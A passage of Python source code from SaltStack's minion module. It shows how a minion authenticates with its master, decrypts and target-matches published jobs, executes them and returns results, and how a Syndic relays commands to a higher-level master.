log.info("fire_master failed: {0}".format(traceback.format_exc()))
def _handle_payload(self, payload):
'''
Takes a payload from the master publisher and does whatever the
master wants done.
'''
{'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[payload['enc']](payload['load'],
payload['sig'] if 'sig' in payload else None)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, checks the signature if pub signatures
are turned on, decrypts it, and runs the encapsulated instructions
'''
# Verify that the signature is valid
master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')
if sig and self.functions['config.get']('sign_pub_messages'):
if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
raise AuthenticationError('Message signature failed to validate.')
try:
data = self.crypticle.loads(load)
except AuthenticationError:
# decryption of the payload failed, try to re-auth but wait
# random seconds if set in config with random_reauth_delay
if 'random_reauth_delay' in self.opts:
reauth_delay = randint(0, float(self.opts['random_reauth_delay']))
# This mitigates the issue wherein a long-running job might not return
# on a master key rotation. However, new commands issued during the re-auth
# splay period will still fail to return.
if not salt.utils.minion.running(self.opts):
log.debug('Waiting {0} seconds to re-authenticate'.format(reauth_delay))
time.sleep(reauth_delay)
else:
log.warning('Ignoring re-auth delay because jobs are running')
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in data:
match_func = getattr(self.matcher,
'{0}_match'.format(data['tgt_type']), None)
if match_func is None:
return
if data['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = data.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(data['tgt'], delimiter=delimiter):
return
elif not match_func(data['tgt']):
return
else:
if not self.matcher.glob_match(data['tgt']):
return
# If the minion does not have the function, don't execute,
# this prevents minions that could not load a minion module
# from returning a predictable exception
#if data['fun'] not in self.functions:
# return
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_pub(self, load):
'''
Handle public key payloads
'''
pass
def _handle_clear(self, load):
'''
Handle un-encrypted transmissions
'''
pass
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if isinstance(data['fun'], string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
# If we are running in multi-master mode, re-inject opts into module funcs
if instance.opts.get('multimaster', False):
for func in instance.functions:
sys.modules[instance.functions[func].__module__].__opts__ = self.opts
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target, args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
salt.utils.appendproctitle(data['jid'])
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
sys.modules[func.__module__].__context__['retcode'] = 0
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = sys.modules[func.__module__].__context__.get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = ('TypeError encountered executing {0}: {1}. See '
'debug log for more info.').format(function_name, exc)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = '{0!r} is not available.'.format(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return'):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'load': ret.get('__load__')}
load['return'] = {}
for key, value in ret.items():
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in list(ret.items()):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _set_tcp_keepalive(self):
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
def _set_reconnect_ivl(self):
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
def _set_ipv4only(self):
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def _setsockopts(self):
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self.socket.setsockopt(zmq.SUBSCRIBE, 'broadcast')
self.socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_ipv4only()
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
def authenticate(self, timeout=60, safe=True):
'''
Authenticate with the master, this method breaks the functional
paradigm, it will update the master information from a fresh sign
in, signing in can occur as often as needed to keep up with the
revolving master AES key.
'''
log.debug(
'Attempting to authenticate with the Salt Master at {0}'.format(
self.opts['master_ip']
)
)
auth = salt.crypt.Auth(self.opts)
self.tok = auth.gen_token('salt')
acceptance_wait_time = self.opts['acceptance_wait_time']
acceptance_wait_time_max = self.opts['acceptance_wait_time_max']
if not acceptance_wait_time_max:
acceptance_wait_time_max = acceptance_wait_time
while True:
creds = auth.sign_in(timeout, safe)
if creds == 'full':
return creds
elif creds != 'retry':
log.info('Authentication with master at {0} successful!'.format(self.opts['master_ip']))
break
log.info('Waiting for minion key to be accepted by the master.')
if acceptance_wait_time:
log.info('Waiting {0} seconds before retry.'.format(acceptance_wait_time))
time.sleep(acceptance_wait_time)
if acceptance_wait_time < acceptance_wait_time_max:
acceptance_wait_time += acceptance_wait_time
log.debug('Authentication wait time is {0}'.format(acceptance_wait_time))
self.aes = creds['aes']
if self.opts.get('syndic_master_publish_port'):
self.publish_port = self.opts.get('syndic_master_publish_port')
else:
self.publish_port = creds['publish_port']
self.crypticle = salt.crypt.Crypticle(self.opts, self.aes)
def module_refresh(self, force_refresh=False):
'''
Refresh the functions and returners.
'''
self.functions, self.returners, _ = self._load_modules(force_refresh)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Refresh the functions and returners.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
if func == 'delete':
self.schedule.delete_job(name)
elif func == 'add':
self.schedule.add_job(schedule)
elif func == 'modify':
self.schedule.modify_job(name, schedule, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, where)
elif func == 'run_job':
self.schedule.run_job(name, where)
elif func == 'disable_job':
self.schedule.disable_job(name, where)
elif func == 'reload':
self.schedule.reload(schedule)
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
ret = channel.send(load)
return ret
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
log.debug('Handling event {0!r}'.format(package))
if package.startswith('module_refresh'):
self.module_refresh()
elif package.startswith('pillar_refresh'):
self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('_minion_mine'):
self._mine_send(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master_ip': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successfull master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.socket
del self.context
del self.poller
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master_ip': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master_ip': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
# Main Minion Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
self._prepare_minion_event_system()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = int(self.opts['loop_interval'])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
ping_interval = self.opts.get('ping_interval', 0) * 60
ping_at = None
while self._running is True:
loop_interval = self.process_schedule(self, loop_interval)
try:
socks = self._do_poll(loop_interval)
if ping_interval > 0:
if socks or not ping_at:
ping_at = time.time() + ping_interval
if ping_at < time.time():
log.debug('Ping master')
self._fire_master('ping', 'minion_ping')
ping_at = time.time() + ping_interval
self._do_socket_recv(socks)
# Check the event system
if socks.get(self.epull_sock) == zmq.POLLIN:
package = self.epull_sock.recv(zmq.NOBLOCK)
try:
self.handle_event(package)
self.epub_sock.send(package)
except Exception:
log.debug('Exception while handling events', exc_info=True)
# Add an extra fallback in case a forked process leeks through
multiprocessing.active_children()
except zmq.ZMQError as exc:
# The interrupt caused by python handling the
# SIGCHLD. Throws this error with errno == EINTR.
# Nothing to receive on the zmq socket throws this error
# with EAGAIN.
# Both are safe to ignore
if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
log.critical('Unexpected ZMQError while polling minion',
exc_info=True)
continue
except SaltClientError:
raise
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
self._pre_tune()
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self._fire_master_minion_start()
loop_interval = int(self.opts['loop_interval'])
# On first startup execute a state run if configured to do so
self._state_run()
while self._running is True:
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
except zmq.ZMQError:
# If a zeromq error happens recover
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
def _do_poll(self, loop_interval):
log.trace('Check main poller timeout {0}'.format(loop_interval))
return dict(self.poller.poll(
loop_interval * 1000)
)
def _do_socket_recv(self, socks):
if socks.get(self.socket) == zmq.POLLIN:
# topic filtering is done at the zmq level, so we just strip it
messages = self.socket.recv_multipart(zmq.NOBLOCK)
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub'
'message from master').format(len(messages_len)))
log.trace('Handling payload')
self._handle_payload(payload)
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if getattr(self, 'poller', None) is not None:
if isinstance(self.poller.sockets, dict):
for socket in self.poller.sockets.keys():
if socket.closed is False:
socket.close()
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
if socket[0].closed is False:
socket[0].close()
self.poller.unregister(socket[0])
if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
self.epub_sock.close()
if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
self.epull_sock.close()
if hasattr(self, 'socket') and self.socket.closed is False:
self.socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, decrypts it, and runs the encapsulated
instructions
'''
# If the AES authentication has changed, re-authenticate
try:
data = self.crypticle.loads(load)
except AuthenticationError:
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
if 'user' in data:
log.debug(
'User {0[user]} Executing syndic command {0[fun]} with '
'jid {0[jid]}'.format(
data
)
)
else:
log.debug(
'Executing syndic command {0[fun]} with jid {0[jid]}'.format(
data
)
)
log.debug('Command details: {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
def _setsockopts(self):
# no filters for syndication masters, unless we want to maintain a
# list of all connected minions and update the filter
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
self._set_ipv4only()
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
loop_interval = int(self.opts['loop_interval'])
self._fire_master_syndic_start()
while True:
try:
socks = dict(self.poller.poll(loop_interval * 1000))
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
except zmq.ZMQError:
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
self._init_context_and_poller()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# register the event sub to the poller
self.poller.register(self.local.event.sub)
# Start with the publish socket
# Share the poller with the event object
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if self.event_forward_timeout is not None and \
self.event_forward_timeout < time.time():
self._forward_events()
# We don't handle ZMQErrors like the other minions
# I've put explicit handling around the receive calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_cmd_socket(self):
try:
messages = self.socket.recv_multipart(zmq.NOBLOCK)
messages_len = len(messages)
idx = None
if messages_len == 1:
idx = 0
elif messages_len == 2:
idx = 1
else:
raise SaltSyndicMasterError('Syndication master received message of invalid len ({0}/2)'.format(messages_len))
payload = self.serial.loads(messages[idx])
except zmq.ZMQError as e:
# Swallow errors for bad wakeups or signals needing processing
if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
raise
log.trace('Handling payload')
self._handle_payload(payload)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
# EINTR some kind of signal maybe someone trying
# to get us to quit so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event {0}'.format(event['tag']))
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
if salt.utils.jid.is_jid(event['tag']) and 'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
